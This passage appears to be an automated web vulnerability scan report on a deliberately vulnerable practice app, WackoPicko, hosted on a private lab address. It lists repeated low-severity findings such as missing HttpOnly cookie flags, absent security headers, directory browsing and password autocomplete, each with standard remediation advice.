Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/
Parameter
PHPSESSID=3to91o8a8k8e5kr8ob87umq081; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/css/stylings.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/css/stylings.php

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Medium (Warning)Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files , backup source files etc which be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/css/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files does not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in directory or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/robots.txt

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/robots.txt

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/
Parameter
PHPSESSID=9jf9hitnjh91rgf4grp1ishmv5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/home.php
Parameter
PHPSESSID=v4s19tq25v45ffl2m1oln5chc1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/upload.php
Parameter
PHPSESSID=h125dko1e4254cmu5p2lft1dm1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/recent.php
Parameter
PHPSESSID=2qg2mi763dgvu7qfphcj8uvck3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/pictures/recent.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/pictures/recent.php

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
PHPSESSID=id7o978shnrd5ddfjm1cbcjuc5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/guestbook.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/guestbook.php

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
PHPSESSID=qbf5uslrv6qehbdn22vhvul8d4; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Password Autocomplete in browser

Description

AUTOCOMPLETE attribute is not disabled in HTML FORM/INPUT element containing password type input. Passwords may be stored in browsers and retrieved.

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
input
Attack
<input type="password" name="password" />

Solution

Turn off AUTOCOMPLETE attribute in form or individual input elements containing password by using AUTOCOMPLETE='OFF'

Reference

http://msdn.microsoft.com/library/default.asp?url=/workshop/author/forms/autocomplete_ovr.asp

CWE Id

525

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/users/login.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/users/login.php

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/register.php
Parameter
PHPSESSID=kagmsnnuhuo38usierjgbje4g0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Password Autocomplete in browser

Description

AUTOCOMPLETE attribute is not disabled in HTML FORM/INPUT element containing password type input. Passwords may be stored in browsers and retrieved.

URL
http://192.168.91.131/WackoPicko/users/register.php
Parameter
input
Attack
<input type="password" name="password" />

Solution

Turn off AUTOCOMPLETE attribute in form or individual input elements containing password by using AUTOCOMPLETE='OFF'

Reference

http://msdn.microsoft.com/library/default.asp?url=/workshop/author/forms/autocomplete_ovr.asp

CWE Id

525

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/users/register.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/users/register.php

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/sample.php?userid=1
Parameter
PHPSESSID=9at9eje0in752f3jleuslrs446; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/users/sample.php?userid=1

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/users/sample.php?userid=1

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php
Parameter
PHPSESSID=0lig0nccr40asgp8b92i9jtpu7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login
Parameter
PHPSESSID=1ibt4cfue8gtgvqa0ifasroht3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Password Autocomplete in browser

Description

AUTOCOMPLETE attribute is not disabled in HTML FORM/INPUT element containing password type input. Passwords may be stored in browsers and retrieved.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login
Parameter
input
Attack
<input type="password" name="password" />

Solution

Turn off AUTOCOMPLETE attribute in form or individual input elements containing password by using AUTOCOMPLETE='OFF'

Reference

http://msdn.microsoft.com/library/default.asp?url=/workshop/author/forms/autocomplete_ovr.asp

CWE Id

525

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/tos.php
Parameter
PHPSESSID=jnmmg4lon9hqtdqcj7l5lob4j7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/tos.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/tos.php

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/css/blueprint/screen.css

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/css/blueprint/screen.css

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/css/blueprint/print.css

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/css/blueprint/print.css

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/css/blueprint/ie.css

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/css/blueprint/ie.css

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/search.php?query=ZAP
Parameter
PHPSESSID=j6asp50ige6pbhcgk103ketmp2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/pictures/search.php?query=ZAP

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/pictures/search.php?query=ZAP

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=15
Parameter
PHPSESSID=v6bmrhud1ra09797s5oqe9m9c2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=14
Parameter
PHPSESSID=v8lsnk91utdobfk2e5t7rogel6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=13
Parameter
PHPSESSID=fav8k33bdu53fk4cftmati0006; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=12
Parameter
PHPSESSID=tu8humhbikk81lun726fhhjke2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=11
Parameter
PHPSESSID=knqtmo4j06f6vceq7hejtf2ql7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=10
Parameter
PHPSESSID=mgkto7tjfho7sut283313s11v2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=9
Parameter
PHPSESSID=7on14b3snkhfl710qppi62phc5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=8
Parameter
PHPSESSID=ub3n7og2p0vlmpp8ono431s1t1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=7
Parameter
PHPSESSID=s76merjj1k1jecnqbf4upn1ai1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
PHPSESSID=8pa7926o446nbllam0js95i1g2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/upload/flowers/flweofoee.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/upload/house/hodjjgld.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/upload/house/our_house.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/upload/waterfall/Waterfall.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/upload/house/My_House.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/upload/flowers/flowers.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/upload/toga/togasfs.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/upload/toga/togas.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/upload/doggie/Dog.jpg.128_128.jpg

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
PHPSESSID=ftnqjm8ams3893eeisf0pqs3o3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

